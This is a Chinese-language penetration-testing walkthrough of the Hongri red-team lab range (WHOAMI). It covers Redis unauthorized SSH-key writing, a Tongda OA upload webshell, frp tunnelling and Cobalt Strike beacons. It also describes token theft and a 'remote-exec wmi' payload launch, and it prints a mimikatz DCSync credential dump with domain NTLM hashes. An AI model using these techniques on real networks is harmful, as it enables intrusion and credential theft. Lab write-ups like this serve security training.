红日靶场(七)WHOAMI Penetration(一)
红日靶场(七)WHOAMI Penetration(一)
原创 Undefin3d团队 Undefin3d安全团队 2024-11-18 12:45
·
DMZ IP段为192.168.1.0/24
·
二层网络 IP段为192.168.52.0/24
·
三层网络 IP段为192.168.93.0/24
第一层网络
首先我们拿到靶机的ip为192.168.1.128,我们直接可以fscan进行端口扫描,发现了一个redis授权漏洞和一个Laravel的cve漏洞
我们直接通过redis未授权写ssh密钥,拿到主机的shell
然后我们直接viper上新建监听,然后一句话上线viper
直接在靶机上运行就可以上线viper
第二层网络
然后我们添加内网路由,查看主机的ip
发现存在内网192.168.52.0/24段的网络,我们上次fscan进行内网扫描,发现了一个通达oa
我们先将通达的端口给转发到本地,然后进行访问
我们使用通达oa的工具进行测试发现一个文件上传的漏洞,我们直接传入🐎上线蚁剑
然后我们通过蚁剑上传我们viper的🐎,就可以上线了
然后添加路由,但是我们发现上传的fscan没法运行,然后又是一台windows的系统,我们直接转cs上线,但是cs上线需要把我们的本地的端口转发到靶机里面,这样我们就可以监听到pc了,我们frp进行内网穿透,我们将第一台靶机设为我们的服务端,本地为客户端,这样就可以了
第一台靶机
本地kali
发现可以连通
我们可以进行测试,在本机监听8008端口,然后在靶机上去访问nc 127.0.0.1 8008,发现可以了
然后我们就可以开启cs的去监听8008端口,viper直接已将转cs,就可以上线cs了
第三层网络
上线cs后我们进行端口的扫描,我们发现93段的ip,我们直接进行探测,然后发现DC的ip是192.168.93.30,和pc2的ip
然后通过 shell ipconfig /displaydns 来查看域名
然后我们查看进程,会发现有域管的进程,我们可以进行令牌的窃取
然后我们进行通过域管的权限去运行我们的🐎就可以上线域管的监听了
remote-exec wmi 192.168.52.30 C:\MYOA\webroot\sh3.exe
然后我们尝试导出域内所有用户的hash值,发现可以导出,然后我们就可以用DCsync攻击就可以
[*] Tasked beacon to run mimikatz’s lsadump::dcsync /domain:WHOAMIANONY.org /all /csv command [+] host called home, sent: 787057 bytes [+] received output: [DC] ‘WHOAMIANONY.org’ will be the domain [DC] ‘DC.whoamianony.org’ will be the DC server [DC] Exporting domain ‘WHOAMIANONY.org’ [rpc] Service
: ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) 502
krbtgt
6be58bfcc0a164af2408d1d3bd313c2a
514 1001
whoami
ab89b1295e69d353dd7614c7a3a80cec
66048 1115
moretz
ba6723567ac2ca8993b098224ac27d90
66048 1002
DC$
202d13c79f52cc1d49870638e854afad
532480 1112
bunny
cc567d5556030b7356ee4915ff098c8f
66048 500
Administrator
ab89b1295e69d353dd7614c7a3a80cec
66048 1113
PC2$
65e034039585f728c8f15fe3f3b814ed
4096
然后我们进行上🐎,直接上线dc,同样操作上线pc2